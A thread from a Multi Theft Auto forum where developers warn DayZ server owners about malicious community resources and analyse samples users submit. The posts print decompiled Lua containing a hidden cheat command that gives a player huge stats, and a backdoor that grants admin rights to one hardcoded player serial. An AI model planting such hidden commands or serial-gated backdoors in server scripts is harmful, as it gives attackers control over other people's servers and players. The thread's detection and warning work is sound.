Important update for MTA DayZ servers

ccw · May 3, 2014

It has come to our attention that a malicious script targeting the MTA DayZ gamemode is in circulation.

If you are an owner of a server running the MTA DayZ gamemode, then you must update your MTA server to the latest build (1.3.5-9.06371)

Linux binaries from here: http://linux.multitheftauto.com/

Windows binaries from here: http://www.mtasa.com/

If you play on a server running the MTA DayZ gamemode, you can check the server version by using the command sver in the client console. If the server build is below 6371, nag the owner to update!

Quited · May 3, 2014

what malicious scripts ?

do you mean cheats ? , or script that using redirectPlayer to redirect players in other servers ?

and what this serial ?

AddBlockedFileReason( "[b][color=#FF0000]5A5FD6E08D503A125C81BA26594B416A[/color][/b]", "Malicious" );

* From CResourceManager.cpp File.

Woovie · May 3, 2014

what malicious scripts ?
do you mean cheats ? , or script that using redirectPlayer to redirect players in other servers ?

and what this serial ?
AddBlockedFileReason( "[b][color=#FF0000]5A5FD6E08D503A125C81BA26594B416A[/color][/b]", "Malicious" ); 
* From CResourceManager.cpp File.

That's the serial of someone who was doing something bad, pretty obvious with the word "Malicious"

The script had functions that did a range of things, from giving items to player teleporting, but the only visible function was one that gave you a list of cars. It was a popular script for MTA DayZ servers so that admins could keep track of stuff.

Lawliet · May 3, 2014

It has come to our attention that a malicious script targeting the MTA DayZ gamemode is in circulation.

What exactly does "script" mean in this regard? Is it a resource you can enable/disable at any time or is it a third party program which exclusively targets MTA DayZ? Also, what exactly is said script trying to accomplish? Do I have to worry about compromised passwords, usernames, resources etc? Is this announcement an extension to this post by Woovie?

EDIT:

I see that Woovie has already answered my questions. We never used that particular resource, so we don't have to worry about anything...but rest assured, we will still update to the latest version once it's available for us.

Quited · May 3, 2014

That's the serial of someone who was doing something bad, pretty obvious with the word "Malicious

ok , i have most serials doing something bad in MTA

and this serial ?

5A5FD6E08D503A125C81BA26594B416A

it is in blacklist ?

Edited May 3, 2014 by Guest

Woovie · May 3, 2014

Yeah, that's why it was added to the source code ._. I thought that was pretty obvious. We have no reason otherwise to add someone to the source code.

Dutchman101 · May 3, 2014

Yeah, that's why it was added to the source code ._. I thought that was pretty obvious. We have no reason otherwise to add someone to the source code.

It's not someone's serial. It's an hash of the malicious files (resource) so that MTA recognizes it.

Quited · May 3, 2014

It's not someone's serial. It's an hash of the malicious files (resource) so that MTA recognizes it.

ok , if somebody can upload malicious resources on community , he can upload more and more Even if get banned.

Woovie · May 3, 2014

It's not someone's serial. It's an hash of the malicious files (resource) so that MTA recognizes it.

ok , if somebody can upload malicious resources on community , he can upload more and more Even if get banned.

Can you just stop posting?

TheNormalnij · May 6, 2014

http://pastebin.com/3uK5ixkG

You can not monitor all malicious resources...

Gallagher · May 23, 2014

Hello"

I found this script mta dayz, it is compiled, and has a addcommandhandler the script, I think it can do harm to the server can check for me?

https://dl.dropboxusercontent.com/s/6ga ... 1400759763

Jusonex · May 23, 2014

Yep, looks like that:

function giveALLNOOBS() 
  setElementData(getLocalPlayer(), "blood", 99999999999999) 
  setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999) 
  setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999) 
end 
addCommandHandler("mamka", giveALLNOOBS)

Gallagher · May 23, 2014

Yep, looks like that:

function giveALLNOOBS() 
  setElementData(getLocalPlayer(), "blood", 99999999999999) 
  setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999) 
  setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999) 
end 
addCommandHandler("mamka", giveALLNOOBS)

I need to use this script, you could delete this scam and send me the file?

Jusonex · May 23, 2014

That's the decompiled Lua script:

function load() 
  for _FORV_3_, _FORV_4_ in pairs(_UPVALUE0_) do 
    tex = engineLoadTXD("mods/" .. _FORV_4_.fileName .. ".txd", _FORV_4_.model) 
    engineImportTXD(tex, _FORV_4_.model) 
    mod = engineLoadDFF("mods/" .. _FORV_4_.fileName .. ".dff", _FORV_4_.model) 
    engineReplaceModel(mod, _FORV_4_.model) 
    txd = engineLoadTXD("mods/1.txd", 2726) 
    engineImportTXD(txd, 2726) 
    dff = engineLoadDFF("mods/1.dff", 2726) 
    engineReplaceModel(dff, 2726) 
    txd = engineLoadTXD("mods/2.txd", 2725) 
    engineImportTXD(txd, 2725) 
    dff = engineLoadDFF("mods/2.dff", 2725) 
    engineReplaceModel(dff, 2725) 
    txd = engineLoadTXD("mods/3.txd", 2644) 
    engineImportTXD(txd, 2644) 
    dff = engineLoadDFF("mods/3.dff", 2644) 
    engineReplaceModel(dff, 2644) 
    txd = engineLoadTXD("mods/4.txd", 2708) 
    engineImportTXD(txd, 2708) 
    dff = engineLoadDFF("mods/4.dff", 2708) 
    engineReplaceModel(dff, 2708) 
    txd = engineLoadTXD("mods/5.txd", 2571) 
    engineImportTXD(txd, 2571) 
    dff = engineLoadDFF("mods/5.dff", 2571) 
    engineReplaceModel(dff, 2571) 
    txd = engineLoadTXD("mods/6.txd", 2568) 
    engineImportTXD(txd, 2568) 
    dff = engineLoadDFF("mods/6.dff", 2568) 
    engineReplaceModel(dff, 2568) 
    txd = engineLoadTXD("mods/7.txd", 2565) 
    engineImportTXD(txd, 2565) 
    dff = engineLoadDFF("mods/7.dff", 2565) 
    engineReplaceModel(dff, 2565) 
    txd = engineLoadTXD("mods/8.txd", 2468) 
    engineImportTXD(txd, 2468) 
    dff = engineLoadDFF("mods/8.dff", 2468) 
    engineReplaceModel(dff, 2468) 
    txd = engineLoadTXD("mods/9.txd", 2562) 
    engineImportTXD(txd, 2562) 
    dff = engineLoadDFF("mods/9.dff", 2562) 
    engineReplaceModel(dff, 2562) 
  end 
end 
addEventHandler("onClientResourceStart", resourceRoot, function() 
  setTimer(load, 1000, 1) 
end) 
function giveALLNOOBS() 
  setElementData(getLocalPlayer(), "blood", 99999999999999) 
  setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999) 
  setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999) 
end 
addCommandHandler("mamka", giveALLNOOBS)

Gallagher · May 23, 2014

That's the decompiled Lua script:

function load() 
  for _FORV_3_, _FORV_4_ in pairs(_UPVALUE0_) do 
    tex = engineLoadTXD("mods/" .. _FORV_4_.fileName .. ".txd", _FORV_4_.model) 
    engineImportTXD(tex, _FORV_4_.model) 
    mod = engineLoadDFF("mods/" .. _FORV_4_.fileName .. ".dff", _FORV_4_.model) 
    engineReplaceModel(mod, _FORV_4_.model) 
    txd = engineLoadTXD("mods/1.txd", 2726) 
    engineImportTXD(txd, 2726) 
    dff = engineLoadDFF("mods/1.dff", 2726) 
    engineReplaceModel(dff, 2726) 
    txd = engineLoadTXD("mods/2.txd", 2725) 
    engineImportTXD(txd, 2725) 
    dff = engineLoadDFF("mods/2.dff", 2725) 
    engineReplaceModel(dff, 2725) 
    txd = engineLoadTXD("mods/3.txd", 2644) 
    engineImportTXD(txd, 2644) 
    dff = engineLoadDFF("mods/3.dff", 2644) 
    engineReplaceModel(dff, 2644) 
    txd = engineLoadTXD("mods/4.txd", 2708) 
    engineImportTXD(txd, 2708) 
    dff = engineLoadDFF("mods/4.dff", 2708) 
    engineReplaceModel(dff, 2708) 
    txd = engineLoadTXD("mods/5.txd", 2571) 
    engineImportTXD(txd, 2571) 
    dff = engineLoadDFF("mods/5.dff", 2571) 
    engineReplaceModel(dff, 2571) 
    txd = engineLoadTXD("mods/6.txd", 2568) 
    engineImportTXD(txd, 2568) 
    dff = engineLoadDFF("mods/6.dff", 2568) 
    engineReplaceModel(dff, 2568) 
    txd = engineLoadTXD("mods/7.txd", 2565) 
    engineImportTXD(txd, 2565) 
    dff = engineLoadDFF("mods/7.dff", 2565) 
    engineReplaceModel(dff, 2565) 
    txd = engineLoadTXD("mods/8.txd", 2468) 
    engineImportTXD(txd, 2468) 
    dff = engineLoadDFF("mods/8.dff", 2468) 
    engineReplaceModel(dff, 2468) 
    txd = engineLoadTXD("mods/9.txd", 2562) 
    engineImportTXD(txd, 2562) 
    dff = engineLoadDFF("mods/9.dff", 2562) 
    engineReplaceModel(dff, 2562) 
  end 
end 
addEventHandler("onClientResourceStart", resourceRoot, function() 
  setTimer(load, 1000, 1) 
end) 
function giveALLNOOBS() 
  setElementData(getLocalPlayer(), "blood", 99999999999999) 
  setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999) 
  setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999) 
end 
addCommandHandler("mamka", giveALLNOOBS)

thank you friend

StreetPunkRulez · June 4, 2014

I heard there is other version of this hack with incluced bypass that detection method.

Woovie · June 4, 2014

I heard there is other version of this hack with incluced bypass that detection method.

1. This isn't a hack, it's a resource...

2. They can't bypass our "detection" since it's a script. Any compiled script we can decompile to check for these types of issues.

Gallagher · June 20, 2014

Hello!

I use this resource on my server for dayz, but I think it has something malicious.

can verify?

https://mega.co.nz/#!nlB2gBQZ!u7Qr9JqZb ... bIVRWBw3Yg

Jusonex · June 21, 2014

It contains a backdoor:

function get(player) 
  if getPlayerSerial(player) == "DFD1A04C59E7CB85FF672E4CC759F9F4" then 
    setElementData(player, "adminn", true) 
  else 
    cancelEvent() 
  end 
end 
addCommandHandler("neves768m", get)

Apart from that it's very insecure (excessive usage of element datas etc.) so I wouldn't recommand you to use it on your server.

lopezloo · June 21, 2014

Eh, guys like author of this script should be global banned by serial.

Gallagher · June 21, 2014

wow

Edited June 22, 2014 by Guest

Jusonex · June 21, 2014

Server: http://pastebin.com/L702uDts

Client: http://pastebin.com/qkJbAw7s

Gallagher · June 21, 2014

Atton · July 20, 2014

Yet another good reason to make encrypted work exclusively on one server

http://pastebin.com/gBV2FHjW

MrBugsFive · February 7, 2015

Hello?

You Check Here Files ??

http://www.mediafire.com/download/iz2fu ... ves768.rar

Pass: neves768.com !!

Please Check is Secure !!

(File Create By Neves768 What Banned/Blocked of Forum by Script Malicius !!)

@Jusonex

Important update for MTA DayZ servers

Recommended Posts

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Link to comment

Recently Browsing 0 members